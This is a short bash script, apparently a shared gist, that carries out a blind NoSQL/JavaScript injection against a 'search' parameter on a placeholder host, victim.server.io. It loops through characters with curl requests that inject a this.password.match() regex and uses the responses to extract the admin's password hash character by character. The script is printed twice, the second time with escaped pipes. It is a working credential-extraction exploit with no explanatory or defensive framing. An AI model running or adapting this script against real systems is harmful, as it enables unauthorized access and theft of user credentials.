razlupercio/homemade-blind-sqli.sh

## homemade-blind-sqli.sh
#!/bin/bash

baseurl="http://victim.server.io/"
hash=""

while [ true ]
do
for x in {{a..z},-,{0..9}}
	do

		if curl -s "$baseurl?search=admin%27%20%26%26%20this.password.match(/^${hash}${x}.*$/)%00:" | grep -q "search=admin"; then

			if curl -s "$baseurl?search=admin%27%20%26%26%20this.password.match(/${hash}${x}$/)%00:" | grep -q "search=admin"; then
				echo "hash is ${hash}"
				break 2 # 2 indicates to break the outer loop
			else

				hash=$hash$x
		    	# echo $hash$x # echo for debug
		    fi

			break
		fi
	done
done
	#!/bin/bash

	baseurl="http://victim.server.io/"
	hash=""

	while [ true ]
	do
	for x in {{a..z},-,{0..9}}
	do

	if curl -s "$baseurl?search=admin%27%20%26%26%20this.password.match(/^${hash}${x}.*$/)%00:" \| grep -q "search=admin"; then

	if curl -s "$baseurl?search=admin%27%20%26%26%20this.password.match(/${hash}${x}$/)%00:" \| grep -q "search=admin"; then
	echo "hash is ${hash}"
	break 2 # 2 indicates to break the outer loop
	else

	hash=$hash$x
	# echo $hash$x # echo for debug
	fi

	break
	fi
	done
	done